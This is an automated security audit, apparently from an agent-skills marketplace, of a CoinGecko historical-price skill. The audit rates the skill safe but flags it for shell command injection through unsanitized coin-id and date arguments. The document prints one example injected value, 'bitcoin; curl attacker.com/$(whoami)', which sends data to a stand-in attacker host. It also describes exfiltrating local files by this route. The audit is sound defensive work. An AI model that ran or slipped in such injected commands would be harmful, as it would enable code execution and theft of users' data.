Skills
skills/paulrberg/agent-skills/coingecko-historical/Gen Agent Trust Hub

coingecko-historical

Pass

Audited by Gen Agent Trust Hub on May 12, 2026

Risk Level: SAFECOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill uses the open command (or platform equivalents) and the system date utility to process requests. This involves executing shell commands based on runtime logic.
  • [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection and command injection. User-supplied inputs for <coin-id> and <date> are inserted directly into shell command strings. An attacker could provide a malicious coin-id (e.g., bitcoin; curl attacker.com/$(whoami)) to execute arbitrary code. The skill instructions lack any requirements for the agent to sanitize, escape, or validate these inputs before execution.
  • [DATA_EXFILTRATION]: While the skill targets a well-known service (coingecko.com), the potential for command injection via the unvalidated arguments could be leveraged to exfiltrate sensitive local environment data or files to an external attacker-controlled domain.
Audit Metadata
Risk Level
SAFE
Analyzed
May 12, 2026, 09:29 AM